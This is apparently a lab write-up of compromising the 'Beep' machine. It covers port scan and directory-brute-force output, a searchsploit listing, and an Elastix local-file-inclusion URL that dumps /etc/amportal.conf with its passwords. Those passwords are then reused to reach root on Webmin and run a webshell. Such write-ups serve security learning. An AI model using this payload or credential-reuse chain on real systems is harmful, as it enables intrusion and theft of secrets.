Beep


Contents

Intro


With a handful of Windows boxes done now, I decided it was time to derust and pop a Linux box - ended up beiong pretty interesting since you get both flags at pretty much the same time!

User and Root


Nmap start:

sudo nmap -sC -sV 10.129.229.183

22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp?
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.129.229.183/
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            852/udp   status
|_  100024  1            855/tcp   status
143/tcp   open  imap?
443/tcp   open  ssl/https?
|_ssl-date: 2026-06-05T12:41:10+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

The machine hands us a bunch of openings - there's an abundance of ports ranging from mailing ports, a databases, a webapp, alongside Webmin.

Port 80 redirects to 443, which is hosting Elastix, a communications server. Default credentials did not work, so I searched for endpoints next:

/images               (Status: 301) [Size: 318] [--> https://10.129.229.183/images/]
/admin                (Status: 301) [Size: 317] [--> https://10.129.229.183/admin/]
/modules              (Status: 301) [Size: 319] [--> https://10.129.229.183/modules/]
/themes               (Status: 301) [Size: 318] [--> https://10.129.229.183/themes/]
/help                 (Status: 301) [Size: 316] [--> https://10.129.229.183/help/]
/mail                 (Status: 301) [Size: 316] [--> https://10.129.229.183/mail/]
/var                  (Status: 301) [Size: 315] [--> https://10.129.229.183/var/]
/lang                 (Status: 301) [Size: 316] [--> https://10.129.229.183/lang/]
/static               (Status: 301) [Size: 318] [--> https://10.129.229.183/static/]
/libs                 (Status: 301) [Size: 316] [--> https://10.129.229.183/libs/]
/.                    (Status: 200) [Size: 1785]
/panel                (Status: 301) [Size: 317] [--> https://10.129.229.183/panel/]
/configs              (Status: 301) [Size: 319] [--> https://10.129.229.183/configs/]
/recordings           (Status: 301) [Size: 322] [--> https://10.129.229.183/recordings/]
/vtigercrm            (Status: 301) [Size: 321] [--> https://10.129.229.183/vtigercrm/]

Login to /admin (in the form of a pop-up) doesn't work either so I press cancel and get booted to https://10.129.229.183/admin/config.php:

Using searchsploit, we find out that Elastiv is vulnerable to LFI and RCE...

searchsploit elastix
------------------------------------------------------------------- --------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- --------------------
Elastix - 'page' Cross-Site Scripting                              | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities            | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities      | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                   | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                  | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                 | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution             | php/webapps/18650.py
------------------------------------------------------------------- --------------------
Shellcodes: No Results

Running searchsploit -x php/webapps/37637.pl

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

This ends up being one of the endpoints gobuster found!

By the looks of it, current_language points to a file inside the machine's system. The link above nets us some handy info:

AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

Above are two user/password combinations - asteriskuser:jEhdIekWmdjE and admin:jEhdIekWmdjE. I tried logging into Webmin with the latter, but to no avail - it works with root as the username however.

This gives us access to manage the system as root. There are plenty of options which could net us both flags, such as an accessible webshell inside of Webmin (I can just straight up fetch both flags), changing passwords of user (after which I can SSH into the machine as root), scheduling commands and cron jobs (for securing a reverse shell), etc.

The webshell in effect

This nets us both flags! In the end I ended up using only a few ports' services, so I'm sure there's more to this machine :) good luck to anyone else trying to pop this box!